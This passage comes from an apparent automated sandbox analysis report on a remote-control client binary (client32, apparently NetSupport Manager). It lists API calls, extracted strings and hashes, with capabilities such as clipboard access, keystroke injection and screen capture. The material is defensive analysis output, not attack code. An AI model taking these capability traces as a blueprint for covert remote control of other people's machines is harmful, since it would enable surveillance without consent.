                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                        • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                        • API String ID: 1861668072-1296821031
                                                                                        • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                        • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                                        • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                        • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(00000000,00001770,0000000A,?,00000000,?,110CF1A6,?), ref: 1108946F
                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                                        • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLock
                                                                                        • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                        • API String ID: 2752051264-327499879
                                                                                        • Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                        • Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
                                                                                        • Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                        • Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 11113387
                                                                                        • GetTickCount.KERNEL32(?,11122D16,00000000,00000000), ref: 111133A1
                                                                                        Strings
                                                                                        • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                        • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountIconicTick
                                                                                        • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                        • API String ID: 1307367305-2838568823
                                                                                        • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                        • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                                        • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                        • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                                        APIs
                                                                                        • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 110C10BD
                                                                                        • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                                        • GetCurrentThreadId.KERNEL32(00000000,00000000,00000000,?,1105E793,00000001,00000001,?,00000000), ref: 110C10E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$BringCurrentIconicShowThread
                                                                                        • String ID:
                                                                                        • API String ID: 4184413098-0
                                                                                        • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                        • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                                        • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                        • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                                        APIs
                                                                                        • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                                        • keybd_event.USER32 ref: 11113215
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ControlDevicekeybd_event
                                                                                        • String ID:
                                                                                        • API String ID: 1421710848-0
                                                                                        • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                        • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                                        • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                        • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                                        APIs
                                                                                        • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
                                                                                        • SetClipboardData.USER32(00000000,00000000), ref: 11033612
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Clipboard$DataFormatName
                                                                                        • String ID:
                                                                                        • API String ID: 3172747766-0
                                                                                        • Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                        • Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
                                                                                        • Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                        • Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,?), ref: 1101DC00
                                                                                        • GetWindowTextLengthA.USER32 ref: 1101DC09
                                                                                        • SendMessageA.USER32(00000000,000000B1,00000001,00000001), ref: 1101DC1E
                                                                                        • _memset.LIBCMT ref: 1101DC2F
                                                                                        • SendMessageA.USER32(00000000,0000043A,00000000,?), ref: 1101DC56
                                                                                        • SendMessageA.USER32(00000000,0000043A,00000001,?), ref: 1101DC6E
                                                                                        • SendMessageA.USER32(00000000,00000444,00000001,?), ref: 1101DCD0
                                                                                        • LoadBitmapA.USER32(00000000,000013CD,Chat,DisableSmileys,00000000,00000000), ref: 1101DD0F
                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 1101DD25
                                                                                          • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                          • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BitmapItemLengthLoadObjectTextWindow__strdup_free_memset
                                                                                        • String ID: Chat$DisableSmileys$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 3923228642-2891806625
                                                                                        • Opcode ID: 04eb4f30466536429864cbd1def46a5f60d12b69a096afe9f455f201eb3f667d
                                                                                        • Instruction ID: c13073a30208fefd3b033e8a449f5569f8ab98db58b479f73fba8d4c12dbe919
                                                                                        • Opcode Fuzzy Hash: 04eb4f30466536429864cbd1def46a5f60d12b69a096afe9f455f201eb3f667d
                                                                                        • Instruction Fuzzy Hash: 49D1A775E00229ABEB24DF64CC85F9EB7B4BF44704F0081D9F919AB284DB74A944CF60
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
                                                                                        • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                                        • API String ID: 2942389153-3574733319
                                                                                        • Opcode ID: cb3c14f1a98fb24556e4b97b91084b05bb62dea3d0a9033288369c69c8ea19ce
                                                                                        • Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
                                                                                        • Opcode Fuzzy Hash: cb3c14f1a98fb24556e4b97b91084b05bb62dea3d0a9033288369c69c8ea19ce
                                                                                        • Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
                                                                                        APIs
                                                                                        • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                                        • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                                        • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                                        • WaitForMultipleObjects.KERNEL32 ref: 110B3183
                                                                                        • OpenFileMappingA.KERNEL32 ref: 110B31A6
                                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                                        • GetDC.USER32(00000000), ref: 110B31E8
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                                        • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                                        • GetTickCount.KERNEL32 ref: 110B323F
                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                                        • GetTickCount.KERNEL32 ref: 110B327F
                                                                                        • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                                        • GdiFlush.GDI32 ref: 110B32A2
                                                                                        • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                                        • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                                        • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                                        • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                                        • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                                        • API String ID: 2071925733-2101319552
                                                                                        • Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                        • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                                        • Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                        • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                                        APIs
                                                                                          • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
                                                                                        • GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
                                                                                          • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                          • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                        • wsprintfA.USER32 ref: 1100553D
                                                                                        • DeleteObject.GDI32(?), ref: 11005592
                                                                                        • DeleteObject.GDI32(?), ref: 1100559B
                                                                                        • SelectObject.GDI32(?,?), ref: 110055B2
                                                                                        • DeleteObject.GDI32(?), ref: 110055B8
                                                                                        • DeleteDC.GDI32(?), ref: 110055BE
                                                                                        • SelectObject.GDI32(?,?), ref: 110055CF
                                                                                        • DeleteObject.GDI32(?), ref: 110055D8
                                                                                        • DeleteDC.GDI32(?), ref: 110055DE
                                                                                        • DeleteObject.GDI32(?), ref: 110055EF
                                                                                        • DeleteObject.GDI32(?), ref: 1100561A
                                                                                        • DeleteObject.GDI32(?), ref: 11005638
                                                                                        • DeleteObject.GDI32(?), ref: 11005641
                                                                                        • ShowWindow.USER32(?,00000009), ref: 1100566F
                                                                                        • PostQuitMessage.USER32(00000000), ref: 11005677
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                        • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                        • API String ID: 2789700732-770455996
                                                                                        • Opcode ID: 5643fefa4b39ee0fff75ee309dbb4bc87683bc06c1bf1752bbaaaa7d6b9440ae
                                                                                        • Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
                                                                                        • Opcode Fuzzy Hash: 5643fefa4b39ee0fff75ee309dbb4bc87683bc06c1bf1752bbaaaa7d6b9440ae
                                                                                        • Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                                        APIs
                                                                                        • BeginPaint.USER32(?,?), ref: 1101586F
                                                                                        • GetWindowRect.USER32(?,?), ref: 11015887
                                                                                        • _memset.LIBCMT ref: 11015895
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 110158B1
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 110158C5
                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 110158D0
                                                                                        • BeginPath.GDI32(00000000), ref: 110158DD
                                                                                        • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015900
                                                                                        • EndPath.GDI32(00000000), ref: 11015907
                                                                                        • PathToRegion.GDI32(00000000), ref: 1101590E
                                                                                        • CreateSolidBrush.GDI32(?), ref: 11015920
